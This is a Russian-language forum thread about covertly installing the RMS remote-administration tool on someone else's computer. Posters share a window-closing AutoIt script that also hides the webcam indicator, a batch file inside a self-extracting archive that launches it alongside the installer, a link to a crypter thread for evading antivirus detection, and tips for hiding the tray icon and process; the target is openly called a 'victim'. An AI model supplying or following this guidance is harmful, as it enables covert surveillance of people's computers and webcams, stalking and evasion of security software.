• Обратная связь: [email protected]

Наш канал в telegram: https://t.me/ru_sfera

Группа VK: https://vk.com/rusfera

Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации

RMS - полностью скрытая установка и управление.

shtraus

Пользователь
Форумчанин
Специально для вас сделал скрипт, убирает все окна...

Пароль:111

RMS_AutoIT_Close.exe - Непакованный скрипт;

RMS_AutoIT_Close _UPX.exe - Упакован UPX;

RMS_AutoIT_Close.au3 - Исходник...

Нужно запустить перед запуском установки...

Спасибо уверена нужна вещь, делаю всякие монипуляции с вашим файлом наверно что то не так делаю

Вот я создала сборку и получился файл Rms.exe внутри этого файла находятся еще два файла вот эти

RMS_AutoIT.exe
rms.host6.3ru_mod.msi

И я вот ваш файл добавила к ним и получилось вот так
5e65c88a7e4d.png

Правильно я сделала?

X-Shar

:)
Администрация
Правильно я сделала?
Наверное, смысл в том что-бы запустить вначале скрипт, а потом сам инсталл, либо одновременно можно...

Скрипт мониторит и в случае появления окна, закроет его...

З.Ы. Вы что хотите Пентагон взломать, столько труда с этими РМС ?i'm crazy

З.Ы.З.Ы. Неужели Царь сея Руси, не реализовал в своей сборке закрытия окон, вроде в описании есть-же...

Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!

Пойду фильмак этот пересмотрю, чот захотелось посмотреть, спасибо Царю !смех-смех!!!

shtraus

Пользователь
Форумчанин
Наверное, смысл в том что-бы запустить вначале скрипт, а потом сам инсталл, либо одновременно можно...

Скрипт мониторит и в случае появления окна, закроет его...

З.Ы. Вы что хотите Пентагон взломать, столько труда с этими РМС ?i'm crazy

З.Ы.З.Ы. Неужели Царь сея Руси, не реализовал в своей сборке закрытия окон, вроде в описании есть-же...

Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!Dmeh-Smeh-Smeh!!!

Пойду фильмак этот пересмотрю, чот захотелось посмотреть, спасибо Царю !смех-смех!!!

Скрипт это тот файл что вы дали?

В смысле сперва устанавливаю Rms.exe а потом вашь файлы?
Эти
RMS_AutoIT_Close.au3
RMS_AutoIT_Close.exe
RMS_AutoIT_Close _UPX.exe

Или если вы емеете ввиду сперва запустить ваши файлы а потом сам Rms.exe мой файл то как то не пойму если я сперва не установлю свой Rms.exe файл то как я попаду на удаленный компьютер чтобы запустить файлы что вы дали?

Нет не пентагон а важнее чем тысяча петагонов, свою семью
Спасибо что помоагете и вам без разницы кто я, просто некоторые люди вроде пытаются как бы помочь но и почему то важно кто я женщина или мужчина, я спрашиваю какая разница кто я, а если за монитором сидит жирный потный мужик меняет дело, странно просто хотела узнать может такая фишка такая тут на форуме :)

Правда у меня проблемы и кроме меня никто не решит ситуацию, только я

Последнее редактирование:

X-Shar

Администрация
В начале нужно запустить RMS_AutoIT_Close.exe, а потом уже установка Rms.exe...

Этот скрипт также скрывает камеру, но в автозапуск не добовляется, поэтому если жертва перезапустит комп, то нужно перед открытием камеры, запустить его, что-бы скрылось окно...
Спасибо что помоагете и вам без разницы кто я
Ну здесь не очень любят, когда "жирный потный мужик" притворяется под девушку, как-то так...смех-смех!!!

shtraus

Пользователь
Форумчанин
В начале нужно запустить RMS_AutoIT_Close.exe, а потом уже установка Rms.exe...

Этот скрипт также скрывает камеру, но в автозапуск не добовляется, поэтому если жертва перезапустит комп, то нужно перед открытием камеры, запустить его, что-бы скрылось окно...

Ну здесь не очень любят, когда "жирный потный мужик" притворяется под девушку, как-то так...смех-смех!!!
я не толстый потный мужик, я женщина и мать, собственно поэтому мне пришлось столкнутся ситуацией что просто необходима эта программа

подскажите как нибудь по проще куда поставить файлы что вы дали, как я выше описала впихнуть ваши файлы в rms.exe так можно?

X-Shar

Администрация
подскажите как нибудь по проще куда поставить файлы что вы дали, как я выше описала впихнуть ваши файлы в rms.exe так можно?
Можно, но нужно подцепить его на запуск...

Курите SFX архивы...

Легче всего это делать в WinRar !

X-Shar

Администрация
В качестве примера сделал SFX архив, в архиве бат-файл RMS_Install.bat, в нём:

start RMS_AutoIT_Close.exe
start RMS.exe

Кидайте туда, что нужно запустить, далее правьте бат-файл...

А вообще надоело, больше не буду повторятся, на форуме всё есть...NO-no!!!NO-no!!!NO-no!!!

Вложения

• RMS_SFX.rar
    38.5 КБ · Просмотры: 50

X-Shar

Администрация
Вот ещё полезно почитать:https://ru-sfera.pw/threads/delaem-krutoj-kripto-dzhojner-i-obxodim-detekt-vt.1858/

Palanomix

Пользователь
Форумчанин
Всем привет) Тема интересная очень. Читаю пока сначала. Если кому не сложно, ответьте на некоторые вопросы, которые, возможно, уже обсуждались в теме.
Здесь обсуждается скрытая удаленная установка, как я понял.
А если имеется доступ к компьютеру-хосту? Хватит ли один раз установить рмску, скрыть его, добавить в исключения ав-а? интернет-ид никогда не меняется? еще вопрос, как скрыть этот чертов значок из трея в последней версии? Ну, и за одно скрыть процесс.

BORSYKMAG

Пользователь
Форумчанин
Всем привет) Тема интересная очень. Читаю пока сначала. Если кому не сложно, ответьте на некоторые вопросы, которые, возможно, уже обсуждались в теме.
Здесь обсуждается скрытая удаленная установка, как я понял.
А если имеется доступ к компьютеру-хосту? Хватит ли один раз установить рмску, скрыть его, добавить в исключения ав-а? интернет-ид никогда не меняется? еще вопрос, как скрыть этот чертов значок из трея в последней версии? Ну, и за одно скрыть процесс.

1. А если имеется доступ к компьютеру-хосту? - да
2. Хватит ли один раз установить рмску, скрыть его, добавить в исключения ав-а? -да
3. интернет-ид никогда не меняется? - нет не меняется, есть скрипт на автоите от X-Shar через который закривается вопрос при установке програми и автоматически прописывается что бы повторно неустанавливалось.
4. еще вопрос, как скрыть этот чертов значок из трея в последней версии? Dll от MrBurna для версии 6.3, есть еще один метод в реестре в файле ophions заменить в одном месте 08 на 09- но етод метод еще не проверял.
5. Ну, и за одно скрыть процесс - можно

Верх Низ